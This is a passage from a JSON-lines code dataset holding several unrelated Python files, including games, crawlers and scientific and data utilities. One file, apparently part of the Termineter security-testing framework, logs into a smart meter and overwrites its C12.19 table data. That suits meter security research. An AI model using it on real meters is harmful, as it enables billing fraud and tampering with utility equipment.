platform.python_implementation()\n\n if implementation == 'CPython':\n implementation_version = platform.python_version()\n\n elif implementation == 'PyPy':\n if hasattr(sys, \"pypy_version_info\"):\n pypy_version_info = getattr(sys, \"pypy_version_info\")\n implementation_version = f'{pypy_version_info.major}.{pypy_version_info.minor}.{pypy_version_info.micro}'\n \n if pypy_version_info.releaselevel != 'final':\n implementation_version = ''.join([\n implementation_version, pypy_version_info.releaselevel\n ])\n\n else:\n implementation_version = 'Unknown'\n\n except:\n pass\n\n try:\n implementation_branch = platform.python_branch()\n except:\n implementation_branch = 'Unknown'\n\n return {'name': implementation, 'version': implementation_version, 'branch': implementation_branch}\n\n\ndef _platform_info() -> dict:\n \"\"\"Return a dict with the system version and release.\"\"\"\n\n try:\n platform_system = platform.system()\n except:\n platform_system = 'Unknown'\n\n try:\n platform_release = platform.release()\n except:\n platform_release = 'Unknown'\n\n return {'system': platform_system, 'release': platform_release}\n\n\ndef _packages_info() -> dict:\n \"\"\"Return a dict with installed packages version\"\"\"\n\n return Dependencies.installed_packages()\n\n\ndef bug_info(default_options, default_env, connections_info, last_execution:dict):\n \"\"\"Generate information for a bug report.\"\"\"\n\n python_info = _python_info()\n platform_info = _platform_info()\n packages_info = _packages_info()\n default_options_info = default_options\n last_execution = last_execution\n\n # TODO: collect information about: \n # jupyter information (front end, versions)\n # ipython environment (version, temp file locations)\n # all modules versions\n # cell content, \n # environment variables, (that starts with KQLMAGIC and others)\n # default options, \n # result object (if doesn't exist), \n # 
last error (including stack), \n\n return {\n 'kqlmagic': {'version': kqlmagic_version},\n 'platform': platform_info,\n 'packages': packages_info,\n 'python': python_info,\n 'kqlmagic_default_options': default_options_info,\n 'kqlmagic_connections:': connections_info,\n 'kqlmagic_default_env': default_env,\n 'Kqlmagic_last_execution': last_execution,\n }\n","repo_name":"microsoft/jupyter-Kqlmagic","sub_path":"azure/Kqlmagic/bug_report.py","file_name":"bug_report.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"47"} +{"seq_id":"41566494405","text":"from myPackage import requests\n\nparameters={\"country\":\"IRAN\"}\nresponse = requests.get(\"http://universities.hipolabs.com/search?\",parameters)\n\n\nif response.status_code==200:\n res_json=response.json()\nelse:\n print(\"Error :\" , response.status_code)\n\n\nprint(res_json[0][\"name\"])\n\n\n\n","repo_name":"rezaho96/AI_Course","sub_path":"PythonAdvanced/package/myPackage/API_Test1.py","file_name":"API_Test1.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39790984266","text":"import pygame\nimport sys\nimport global_variables as gv\nimport pacman as pm\nimport animation as ani\nimport ghost as gh\n\n# initialize pygame\npygame.init()\npygame.font.init()\nclock = pygame.time.Clock()\n\n# game logic variables\nreached_second_level = False\nreached_third_level = False\nin_first_level = True\nin_menu = True\nwin = False\nran_once = False\nx = 0\n\n# animation variables\nflash_text_counter = 0\ngv.pacman_tick_counter = 0\n\n# generating a screen\ngv.screen = pygame.display.set_mode(gv.screensize)\npygame.display.set_caption(\"Daniel's PacMan\")\n\n# create pacman and ghost objects\ngv.pacman = pm.Pacman([480, 200])\nghost_starting_positions = [[30, 30], [950, 30], [30, 450], [950, 450]]\nghost_second_level_positions = [[30, 30], [950, 30], [30, 450], [950, 450]]\nghost_third_level_positions = [[30, 30], [950, 30], [30, 450], [950, 450]]\nfor ghost_type in range(4):\n gv.ghosts.append(gh.Ghost(ghost_type, ghost_starting_positions[ghost_type]))\n\n# create pellet lists\nani.read_pellet_images()\n\n# menu loop\nwhile in_menu:\n gv.screen.fill((0, 0, 0))\n if flash_text_counter == 0:\n flash_text_counter = 1\n else:\n flash_text_counter = 0\n ani.draw_hint(gv.screen) # showing the text\n # ordinary pygame loop which enables closing\n gv.keys_pressed = pygame.key.get_pressed()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n # if space pressed than the game starts\n if gv.keys_pressed[pygame.K_SPACE]:\n in_menu = False\n\n ani.draw_heading(gv.screen) # showing the text\n pygame.display.flip()\n clock.tick(5)\n\n# main game loop\nwhile not gv.game_over:\n # event handling\n gv.keys_pressed = pygame.key.get_pressed()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n # game logic\n gv.pacman.pacman_event_handler(gv.keys_pressed)\n gv.pacman.move()\n if ran_once:\n gv.pacman.test_ghost_collision()\n for ghost in gv.ghosts:\n ghost.move()\n\n # switching levels\n if gv.score == 587 and in_first_level: # changes to 2nd level\n gv.pacman.position[0] = 480 # reset pacman position\n gv.pacman.position[1] = 200\n in_first_level = False\n gv.current_level = 1\n gv.score = 0\n reached_second_level = True\n x = 1 # new level path\n for j in range(4): # reset the position of the ghosts\n 
gv.ghosts[j].position = ghost_second_level_positions[j]\n\n # changes to 3rd level\n elif gv.score == 422 and reached_second_level:\n gv.pacman.position[0] = 480 # reset pacman position\n gv.pacman.position[1] = 200\n gv.current_level = 2\n gv.score = 0\n reached_third_level = True\n reached_second_level = False\n x = 2 # new level path\n for j in range(4): # reset the position of the ghosts\n gv.ghosts[j].position = ghost_second_level_positions[j]\n\n elif gv.score == 340 and reached_third_level:\n win = True\n\n # animation\n ani.blit_level(gv.LEVEL_PATHS[x], gv.screen)\n ani.draw_pellets(gv.screen, gv.current_level)\n ani.draw_score(gv.screen)\n\n gv.pacman.ani_tick_counter = gv.pacman.ani_tick_counter + 1\n if gv.pacman.ani_tick_counter >= gv.pacman.ANI_DURATION - 1:\n gv.pacman.ani_tick_counter = 0\n\n gv.pacman.blit_pacman(gv.screen)\n for ghost in gv.ghosts:\n ghost.blit_ghost(gv.screen)\n\n pygame.display.flip()\n clock.tick(30)\n ran_once = True\n\n # the end screen if you win (same system as in menu loop)\n while win:\n gv.screen.fill((0, 0, 0))\n if flash_text_counter == 0:\n flash_text_counter = 1\n else:\n flash_text_counter = 0\n ani.draw_hint2(gv.screen)\n gv.keys_pressed = pygame.key.get_pressed()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n if gv.keys_pressed[pygame.K_SPACE]:\n gv.game_over = True\n win = False\n ani.draw_win(gv.screen) # showing the text\n pygame.display.flip()\n clock.tick(5)\n\n # the end screen if you lose (same system as in menu loop)\n while gv.lose:\n gv.screen.fill((0, 0, 0))\n if flash_text_counter == 0:\n flash_text_counter = 1\n else:\n flash_text_counter = 0\n ani.draw_hint2(gv.screen)\n\n gv.keys_pressed = pygame.key.get_pressed()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n if gv.keys_pressed[pygame.K_SPACE]:\n gv.game_over = True\n gv.lose = False\n ani.draw_lost(gv.screen) # showing the text\n pygame.display.flip()\n clock.tick(5)\n","repo_name":"Daniel031000/pacman-unchained2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32604385647","text":"import sqlite3\nfrom contextlib import closing\nfrom crawler import fetch_page, get_total_pages\n\ntotal = 1\ncurrent = 1\noutput = []\nwhile current <= total:\n response = fetch_page(current)\n\n if current == 1:\n total = get_total_pages(response)\n\n for dissertation in response['tesesDissertacoes']:\n print(dissertation)\n output.append(dissertation)\n\n current += 1 # let's go to the next page (the while condition blocks a non-existent page)\n\ndados = []\nfor saida in output:\n if saida not in dados:\n dados.append((saida['id'], saida['instituicao'], saida['nomePrograma'], saida['municipioPrograma'],\n saida['titulo'], saida['autor'], saida['dataDefesa'], saida['volumes'], saida['paginas'],\n saida['biblioteca'], saida['grauAcademico'], saida['link']))\n\nwith sqlite3.connect(\"tesesDissertacoes.db\") as conexao:\n with closing(conexao.cursor()) as cursor:\n cursor.execute(\"\"\" CREATE TABLE IF NOT EXISTS \n tesesDissertacoes(id integer primary key autoincrement, codigo text,\n instituicao text, programa text, municipio text, titulo_trabalho text, autor_trabalho text,\n data_defesa text, num_volumes text, num_paginas text, biblioteca text, grau_academico text, \n link text)\"\"\")\n\n cursor.executemany(\"\"\" INSERT INTO tesesDissertacoes(codigo, instituicao, programa, 
municipio, \n titulo_trabalho, autor_trabalho, data_defesa, num_volumes, num_paginas, biblioteca, grau_academico, \n link) values(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?); \"\"\", dados)\n\n conexao.commit()\n\n print(\"Base de dados criada e populada com sucesso!\")\n","repo_name":"Riverfount/PesquisaTeses","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"27259740230","text":"import numpy\nimport string\n\ndef read(mol, f, cycle = 0):\n \"\"\"\n Routine, which reads an xyz file\n :Parameters:\n -f (obj): xyz file object\n -mol (obj): instance of a molclass\n \"\"\"\n ncycle=0\n fline = f.readline().split()\n natoms = int(fline[0])\n ### look how many cycles are in \n# for line in f.readlines():\n# sline=line.split()\n# if len(sline)==1:\n# if int(sline)==natoms: ncycle+=1\n# ### now seek to cycle\n# cycle=range(ncycle)[cycle]\n# f.seek(natoms*cycle+1)\n# if len(fline)>1:\n# cellparams = map(float,fline[1:7])\n# mol.set_cellparams(cellparams)\n f.readline()\n xyz = numpy.zeros((natoms, 3))\n elements = []\n atypes = []\n for i in range(natoms):\n line = f.readline().split()\n elements.append(line[0].lower())\n atypes.append(line[0].lower())\n xyz[i,:] = list(map(float,line[1:4]))\n mol.natoms = natoms\n mol.xyz = numpy.array(xyz)\n mol.elems = elements\n mol.atypes = atypes\n mol.set_empty_conn()\n mol.set_nofrags()\n return\n\ndef write(mol, fname):\n \"\"\"\n Routine, which writes an xyz file\n :Parameters:\n -fname (str): name of the xyz file\n -mol (obj): instance of a molclass\n \"\"\"\n natoms = mol.natoms \n f = open(fname,\"w\")\n# if mol.periodic:\n# f.write(\"%5d %10.4f %10.4f %10.4f %10.4f %10.4f %10.4f\\n\\n\" % tuple([mol.natoms]+mol.cellparams))\n# else:\n f.write(\"%d\\n\\n\" % mol.natoms)\n for i in range(natoms):\n f.write(\"%2s %12.6f %12.6f %12.6f\\n\" % (mol.elems[i], mol.xyz[i,0], mol.xyz[i,1], mol.xyz[i,2]))\n f.close()\n return\n","repo_name":"hopefulp/sandbox","sub_path":"Archive_sand/MOF_plus/molsys/molsys/fileIO/xyz.py","file_name":"xyz.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21069095362","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\nnums = list(map(int,input().split()))\r\nnums.sort()\r\ndef check():\r\n st=0\r\n en=len(nums)-1\r\n min_s=2e9\r\n st_num=0\r\n en_num=0\r\n while stabs(s):\r\n st_num=nums[st]\r\n en_num=nums[en]\r\n min_s=abs(s)\r\n if s<0:\r\n st+=1\r\n elif s>0:\r\n en-=1\r\n else:\r\n return (st_num,en_num)\r\n return (st_num,en_num)\r\n\r\nprint(*check())","repo_name":"nuheajiohc/algorithm-study","sub_path":"백준/Gold/2470. 
두 용액/두 용액.py","file_name":"두 용액.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"72425554062","text":"import sys\nimport requests\n\ndef list_nfts(address):\n if not address:\n raise ValueError(\"Address cannot be empty\")\n\n API_ENDPOINT = f\"https://api.blockcypher.com/v1/btc/main/addrs/{address}/full\"\n try:\n response = requests.get(API_ENDPOINT)\n response.raise_for_status()\n response_data = response.json()\n except requests.exceptions.RequestException as e:\n raise ValueError(f\"Error fetching address data: {e}\")\n\n nfts = []\n if \"txs\" in response_data:\n for tx in response_data[\"txs\"]:\n for output in tx[\"outputs\"]:\n if \"data_hex\" in output:\n try:\n metadata_hex = output[\"data_hex\"]\n metadata = bytes.fromhex(metadata_hex).decode(\"utf-8\")\n nfts.append({\"txid\": tx[\"hash\"], \"metadata\": metadata})\n except ValueError as e:\n print(f\"Error decoding metadata: {e}\")\n else:\n raise ValueError(\"No transactions found for the given address\")\n\n return nfts\n\nif __name__ == \"__main__\":\n try:\n address = sys.argv[1]\n nfts = list_nfts(address)\n print(nfts)\n except (IndexError, ValueError) as e:\n print(f\"Error: {e}\")\n","repo_name":"REDEXCT/DAVID-x-REDEX","sub_path":"Project 2/Ordinal Audio/nft_listing.py","file_name":"nft_listing.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33496639817","text":"import os\nimport re\nimport random\nimport datetime\n\nclass AlphaSubstBaseMLBootstrap:\n \"This package will perform bootstrap acoording to its parameters, and encapsulate the baseML functionality\"\n\n def __init__(self, ResultsFolder):\n \"Doc Holder\"\n self.ResultsFolder = ResultsFolder\n self.BaseMLBranchDesc = []\n self.TransRatio = \"\"\n self.RateMatrix = []\n self.BaseFreq = []\n self.RateParameters = []\n self.RateParameterHeaders = []\n self.GotExtraBaseML = 0\n\n def RunBaseML(self,BaseMLLoc,UserRandomKey,GalaxyLocation):\n \"This function will execute baseml and return the results for the branch description\"\n op = os.popen(BaseMLLoc + \"baseml \" + GalaxyLocation + \"tools/mdea/BaseMLWork/\" + str(UserRandomKey) + \"-baseml.ctl\")\n\n def FinalCleanUp(self,BaseMLLocation,GalaxyLocation,UserRandomKey):\n \"This function will clear the tree and the baseml.ctl files\"\n op = os.remove(GalaxyLocation + 'tools/mdea/BaseMLWork/' + str(UserRandomKey) + \"-baseml.ctl\")\n op = os.remove(GalaxyLocation + 'tools/mdea/BaseMLWork/' + str(UserRandomKey) + \"-tmp.tree\")\n\n self.DeleteOldFiles(GalaxyLocation,3)\n\n def DeleteOldFiles(self,DirectoryToSearch,DaysOld):\n \"This program will search the work directory and delete files that are older than 3 days\"\n CorrectFormatSearch = re.compile('^[0-9]{4}-[0-9]{2}-[0-9]{2}-[0-9]+-(baseml|tmp)')\n WorkDirectory = DirectoryToSearch + 'tools/mdea/BaseMLWork/' \n TodaysDateValue = int(self.DateToDays(str(datetime.date.today())))\n DateDifference = 0\n #Open the directory and return the file names\n for FileName in os.listdir(WorkDirectory):\n if CorrectFormatSearch.search(FileName):\n FilesDateValue = int(self.DateToDays(FileName))\n DateDifference = TodaysDateValue - FilesDateValue\n\n if DateDifference > int(DaysOld):\n op = os.remove(WorkDirectory + str(FileName))\n\n def MonthToDays(self,MonthValue):\n \"This returns how many days have passed in the month - no leap year support as yet\"\n 
DaysInMonths = [31,28,31,30,31,30,31,31,30,31,30,31]\n MonthDays = 0\n for MonthIndex in range(0,MonthValue - 1):\n MonthDays += int(DaysInMonths[MonthIndex]) \n return MonthDays\n\n def DateToDays(self,DateString):\n DateSplitter = re.compile(\"-\")\n aDateParts = DateSplitter.split(DateString)\n Years = int(aDateParts[0][2:]) * 365\n Months = int(self.MonthToDays(int(aDateParts[1])))\n Days = int(aDateParts[2])\n return Years + Months + Days\n\n def ReturnBaseMLFile(self,UserRandomKey,GalaxyLocation):\n \"This function will return the contents of the baseml output file, enclosed in a textarea\"\n FileResults = \"\"\n BaseMLOut = open(GalaxyLocation + 'tools/mdea/BaseMLWork/' + str(UserRandomKey) + \"-tmp.out\")\n FileResults = BaseMLOut.read()\n return FileResults\n\n def ScoreBaseML(self,BaseMLLoc,UserRandomKey,BranchDescriptions,GalaxyLocation,GetSE,DoExtraBaseML,SubstModel):\n \"This function will read tmp.out and set an array of the scores - return a 1 if it was successful - 0 otherwise\"\n SuccessfulRun = 0\n SubstModel = int(SubstModel)\n ScoreLineCheck = re.compile('[0-99]\\.\\.[0-99]')\n SESearch = re.compile('SEs for parameters')\n BaseFreqSearch = re.compile('^Average')\n KappaSearch = re.compile('^Parameters \\(kappa\\)')\n RateParameterSearch = re.compile('Rate parameters')\n ThreeSpaceSplitter = re.compile(' ')\n TwoSpaceSplitter = re.compile(' ')\n OneSpaceSplitter = re.compile(\" \")\n SpaceSplitter = re.compile(\"\\s\")\n CommaJoin = re.compile(\",\")\n NewLineSplitter = re.compile('\\n')\n TransSearch = re.compile('Ts\\/Tv');\n EqualSplit = re.compile('=')\n\n DoExtraBaseML = int(DoExtraBaseML)\n TransParts = []\n RateParts = []\n TransRatio = 0\n FileContents = []\n BranchNameArray = []\n BranchScoreArray = []\n BaseMLScoreResults = []\n FinalBranchEntry = []\n SEResults = []\n BaseMLOut = open(GalaxyLocation + 'tools/mdea/BaseMLWork/' + str(UserRandomKey) + \"-tmp.out\")\n FileContents = NewLineSplitter.split(BaseMLOut.read())\n for FileIndex in range(0,len(FileContents)):\n if ScoreLineCheck.search(FileContents[FileIndex]):\n FileContents[FileIndex] = FileContents[FileIndex].strip()\n FileContents[FileIndex+1] = FileContents[FileIndex+1].strip()\n BranchNameArray = ThreeSpaceSplitter.split(FileContents[FileIndex])\n while TwoSpaceSplitter.search(FileContents[FileIndex+1]):\n FileContents[FileIndex+1] = TwoSpaceSplitter.sub(\" \", FileContents[FileIndex+1])\n BranchScoreArray = OneSpaceSplitter.split(FileContents[FileIndex+1])\n if int(GetSE) == 0 and DoExtraBaseML == 0:\n break\n if SESearch.search(FileContents[FileIndex]):\n FileContents[FileIndex+1] = FileContents[FileIndex+1].strip()\n while TwoSpaceSplitter.search(FileContents[FileIndex+1]):\n FileContents[FileIndex+1] = TwoSpaceSplitter.sub(\" \", FileContents[FileIndex+1])\n SEResults = OneSpaceSplitter.split(FileContents[FileIndex+1])\n if DoExtraBaseML == 0:\n break\n\n if DoExtraBaseML == 1 and self.GotExtraBaseML == 0:\n if BaseFreqSearch.search(FileContents[FileIndex]):\n BaseFreqLine = FileContents[FileIndex][10:]\n self.BaseFreq = SpaceSplitter.split(BaseFreqLine.strip())\n\n if KappaSearch.search(FileContents[FileIndex]):\n FileIndex += 1\n KappaLine = FileContents[FileIndex].strip()\n if SubstModel != 6:\n self.RateParameters = [KappaLine]\n self.RateParameterHeaders = ['Kappa']\n else:\n KappaValues = TwoSpaceSplitter.split(KappaLine)\n self.RateParameters = [KappaValues[0],KappaValues[1]]\n self.RateParameterHeaders = ['Kappa1','Kappa2']\n\n if SubstModel == 7 or SubstModel == 8: #Rate Matrix for REV 
and UNREST\n if TransSearch.search(FileContents[FileIndex]):\n TransParts = EqualSplit.split(FileContents[FileIndex])\n TransRatio = TransParts[1].strip()\n self.TransRatio = float(TransRatio)\n #Next 4 lines are the rate matrix data\n for RateLineIndex in range(0,4):\n self.RateMatrix.append([])\n RateLine = FileContents[FileIndex+RateLineIndex+1]\n RateLine = RateLine.strip()\n RateParts = ThreeSpaceSplitter.split(RateLine)\n for RatePartIndex in range(0,4):\n RateParts[RatePartIndex] = RateParts[RatePartIndex].strip()\n self.RateMatrix[RateLineIndex].append(float(RateParts[RatePartIndex]))\n \n if RateParameterSearch.search(FileContents[FileIndex]):\n RateParameterLine = FileContents[FileIndex][17:]\n RateParameterLine = RateParameterLine.strip()\n self.RateParameters = TwoSpaceSplitter.split(RateParameterLine)\n if SubstModel == 7: self.RateParameterHeaders = ['A','B','C','D','E']\n elif SubstModel == 8: self.RateParameterHeaders = []\n else:\n self.RateMatrix = \"\"\n if SubstModel == 0 or SubstModel == 2:\n self.RateParameters = \"\"\n self.RateParameterHeaders = \"\"\n\n BaseMLOut.close()\n #Get BaseML ordered branch descriptions - if they aren't already present\n if len(self.BaseMLBranchDesc) == 0:\n for Branch in BranchNameArray:\n Branch = OneSpaceSplitter.sub(\"\",Branch)\n self.BaseMLBranchDesc.append(Branch)\n\n if len(BranchNameArray) != 0:\n SuccessfulRun = 1\n self.BaseMLScores = BranchScoreArray\n self.SEScores = SEResults\n else:\n SuccessfulRun = 0\n self.BaseMLScores = []\n self.SEScores = []\n\n self.CleanData(UserRandomKey,GalaxyLocation + \"tools/mdea/BaseMLWork/\")\n\n return SuccessfulRun\n\n def CleanData(self,UserRandomKey,WorkDir):\n \"This function will remove the tmp.out and tmp.seq files\"\n op = os.remove(WorkDir + str(UserRandomKey) + \"-tmp.out\")\n op = os.remove(WorkDir + str(UserRandomKey) + \"-tmp.seq\")\n\n def WriteDBSAlignment(self,SequenceLength,SequenceCount,SequenceData,UserRandomKey,DoBootStrap):\n \"This function will bootstrap and write a tmp.seq file for baseML\"\n if str(DoBootStrap) == \"1\":\n StrappedSequence = self.DoStrap(SequenceData,SequenceLength,SequenceCount)\n else:\n StrappedSequence = \" \" + str(SequenceCount) + \" \" + str(SequenceLength) + \"\\n\"\n for Index in range(0,len(SequenceData)):\n StrappedSequence += \">Sequence\" + str(Index + 1) + \"\\n\"\n StrappedSequence += str(SequenceData[Index]) + \"\\n\" \n\n #Check Strapped sequence - for the presence of all nucleotides\n self.WriteFile(\"tools/mdea/BaseMLWork/\" + str(UserRandomKey) + \"-tmp.seq\",StrappedSequence)\n\n def StrapSequence(self,StartSeqArray,SequenceLength,SequenceCount,UserRandomKey,DoBootStrap):\n \"This will create a sequence replica from a starting Sequence (StartingSequence) - and write it as a tmp.out to the baseml work directory\"\n SequenceLine = \"\"\n Splitter = re.compile('\\n') \n \n #Bootstrap and return\n if str(DoBootStrap) == \"1\":\n StrappedSequence = self.DoStrap(StartSeqArray,SequenceLength,SequenceCount)\n else:\n StrappedSequence = \" \" + str(SequenceCount) + \" \" + str(SequenceLength) + \"\\n\" #BaseML Style header\n for BlankArrayIndex in range(0,int(SequenceCount)):\n StrappedSequence += \">Sequence\" + str(BlankArrayIndex + 1) + \"\\n\"\n StrappedSequence += str(StartSeqArray[BlankArrayIndex]) + \"\\n\"\n self.WriteFile(\"tools/mdea/BaseMLWork/\" + str(UserRandomKey) + \"-tmp.seq\",StrappedSequence)\n\n def DoStrap(self,Sequences,SequenceLength,SequenceCount):\n \"Bootstraps a sequence array\"\n FinalSequenceArray = []\n 
FinalSeqFile = \"\"\n for BlankArrayIndex in range(0,int(SequenceCount)):\n FinalSequenceArray.append('') #Initialize a blank array\n\n #Bootstrap the sequences\n \n for SequenceLengthIndex in range(0,int(SequenceLength)):\n SamplePosition = random.randrange(0,int(SequenceLength),1)\n for SequenceCountIndex in range(0,int(SequenceCount)):\n FinalSequenceArray[SequenceCountIndex] += Sequences[SequenceCountIndex][SamplePosition]\n\n #Assemble the replica and return to caller\n FinalSeqFile = \" \" + str(SequenceCount) + \" \" + str(SequenceLength) + \"\\n\" #BaseML Style header\n for BlankArrayIndex in range(0,int(SequenceCount)):\n FinalSeqFile += \">Sequence\" + str(BlankArrayIndex + 1) + \"\\n\"\n FinalSeqFile += str(FinalSequenceArray[BlankArrayIndex][0:]) + \"\\n\"\n return FinalSeqFile\n\n def WriteFile(self,FileName,Data):\n \"This function will write the data passed to a file on the file system\"\n TargetFile = file(FileName, \"w\")\n TargetFile.write(Data)\n TargetFile.close()\n","repo_name":"jmchilton/galaxy-central","sub_path":"tools/mdea/AlphaSubstBaseMLBootstrap.py","file_name":"AlphaSubstBaseMLBootstrap.py","file_ext":"py","file_size_in_byte":11958,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"} +{"seq_id":"25413189733","text":"import_file = \"template.anm2\"\n\nlayer = (\"head0\", \"head1\", \"head2\", \"head3\", \"head4\", \"head5\")\n\nwith open(import_file) as f:\n original = f.readlines()\n\n \nfor i in range(1, 7):\n for j in range(0, 351, 10):\n with open(\"lock_{}_{}.anm2\".format(i, j), \"w\") as k:\n export_file = [line.format(id=i, hue=j, name=layer[i-1]) for line in original]\n k.writelines(export_file)\n\n","repo_name":"patcolyn/RandomRainbowMaggy","sub_path":"generators/anm2-generate/anm2-generate.py","file_name":"anm2-generate.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"41006974470","text":"import re\nfrom binascii import unhexlify\nfrom framework.templates import module_template\nfrom c1218.errors import C1218WriteTableError\n\nclass Module(module_template):\n\tdef __init__(self, *args, **kwargs):\n\t\tmodule_template.__init__(self, *args, **kwargs)\n\t\tself.version = 1\n\t\tself.author = [ 'Spencer McIntyre ' ]\n\t\tself.description = 'Write Data To A C12.19 Table'\n\t\tself.detailed_description = 'This will over write the data in a write able table on the smart meter. 
If USEHEX is set to true then the DATA variable is expected to be represented as a string of hex characters.'\n\t\tself.options.addInteger('TABLEID', 'table to read from', True)\n\t\tself.options.addString('DATA', 'data to write to the table', True)\n\t\tself.options.addBoolean('USEHEX', 'specifies that the \\'DATA\\' option is represented in hex', default = False)\n\t\tself.options.addInteger('OFFSET', 'offset to start writing data at', required = False, default = None)\n\t\n\tdef run(self, frmwk, args):\n\t\ttableid = self.options['TABLEID']\n\t\tdata = self.options['DATA']\n\t\toffset = self.options['OFFSET']\n\t\tlogger = frmwk.get_module_logger(self.name)\n\t\tif self.options['USEHEX']:\n\t\t\thex_regex = re.compile('^([0-9a-fA-F]{2})+$')\n\t\t\tif hex_regex.match(data) == None:\n\t\t\t\tfrmwk.print_error('Non-hex characters found in \\'DATA\\'')\n\t\t\t\treturn\n\t\t\tdata = unhexlify(data)\n\t\t\n\t\tif not frmwk.serial_login():\n\t\t\tlogger.warning('meter login failed')\n\t\t\tfrmwk.print_error('Meter login failed')\n\t\t\treturn\n\t\t\n\t\tconn = frmwk.serial_connection\n\t\ttry:\n\t\t\tconn.setTableData(tableid, data, offset)\n\t\t\tfrmwk.print_status('Successfully Wrote Data')\n\t\texcept C1218WriteTableError as error:\n\t\t\tfrmwk.print_error('Caught C1218WriteTableError: ' + str(error))\n\t\tconn.stop()\n","repo_name":"GrayHatLabs/john_commor_c1218","sub_path":"termineter2/framework/modules/write_table.py","file_name":"write_table.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"4344415711","text":"from datetime import date, datetime, timedelta\nfrom uuid import UUID\n\nfrom sqlalchemy import and_, func, or_\nfrom sqlalchemy.orm import aliased\n\nfrom app.model import Employee, Vacation\nfrom app.repository.base import BaseRepository\n\n\nclass _EmployeeRepository(BaseRepository):\n def _as_paginated_query(self, query, page, per_page):\n return query.count(), query.limit(per_page).offset((page - 1) * per_page).all() \n \n def search_employees(self, session, search_term: str = None, page: int = 1, per_page: int = 10):\n filters = []\n\n if search_term:\n filters = [\n or_(\n self.model.first_name.like(f'%{search_term}%'),\n self.model.last_name.like(f'%{search_term}%'),\n )\n ]\n\n query = session.query(self.model).filter(*filters)\n return self._as_paginated_query(query=query, page=page, per_page=per_page)\n \n def get_employees_in_vacation(self, session, team_id: UUID = None, at_date: date = None, page: int = 1, per_page: int = 10):\n at_date = at_date or date.today()\n \n filters = [\n Vacation.start_date <= at_date, \n Vacation.end_date >= at_date,\n ]\n\n if team_id:\n filters.append(self.model.team_id == team_id)\n\n query = (\n session.query(self.model)\n .join(Vacation, Vacation.employee_id == self.model.id)\n .filter(*filters)\n )\n\n return self._as_paginated_query(query, page, per_page)\n \n def get_employees_shared_vacations(self, session, employee_1: Employee, employee_2: Employee):\n \"\"\"\n Return the days they will both be on vacation\n \"\"\"\n vacation_1 = aliased(Vacation)\n vacation_2 = aliased(Vacation)\n\n overlap_period = (\n session.query(\n func.greatest(vacation_1.start_date, vacation_2.start_date).label(\"start_date\"),\n func.least(vacation_1.end_date, vacation_2.end_date).label(\"end_date\")\n )\n .join(\n vacation_2, \n and_(\n vacation_1.start_date <= vacation_2.end_date,\n vacation_1.end_date >= vacation_2.start_date\n )\n )\n .filter(\n 
vacation_1.employee_id == employee_1.id, \n vacation_2.employee_id == employee_2.id \n )\n .group_by(\n vacation_1.id,\n vacation_2.id,\n )\n .all()\n )\n\n if not overlap_period:\n return {}\n \n overlap_dates = []\n for start_date, end_date in overlap_period:\n overlap_dates.extend(\n [start_date + timedelta(days=i) for i in range((end_date - start_date).days + 1)]\n )\n\n return set(sorted(overlap_dates))\n\n\nEmployeeRepository = _EmployeeRepository(model=Employee)\n","repo_name":"camillebeguin/fastapi-vacation-api","sub_path":"app/repository/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22853146260","text":"import serial, time, csv, os\nimport logging\nimport numpy as np\nimport heartpy as hp\nimport smbus2 as smbus\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as anim\nimport platform\nimport timeit\nimport cayenne.client\nfrom timeit import default_timer as timer_s\nfrom time import perf_counter\nfrom scipy.signal import peak_widths\nfrom scipy.signal import peak_prominences\nfrom scipy.signal import find_peaks\nfrom scipy.signal import find_peaks_cwt\nfrom scipy.signal import resample\nfrom scipy.fft import fft, ifft\nfrom scipy.signal import butter, lfilter\nfrom smbus2 import SMBus\n\nprint(\"Imported Platform module version: \", platform.__version__)\nprint(\"Matplotlib version: \"+mpl.__version__)\n\n##I2C SLAVES SET UP\nDHT_ADDRESS = 8 #0x08\nOXY_ADDRESS = 11 #0x0b\n#slavex_address = xxxx #write address\n#slavey_address = xxxx #write address\n#slavez_address = xxxx #write address\nbus = SMBus(1) #indicates /dev/ic2-1\n\n\n##CAYENNE SERVICE\n# Cayenne authentication info. 
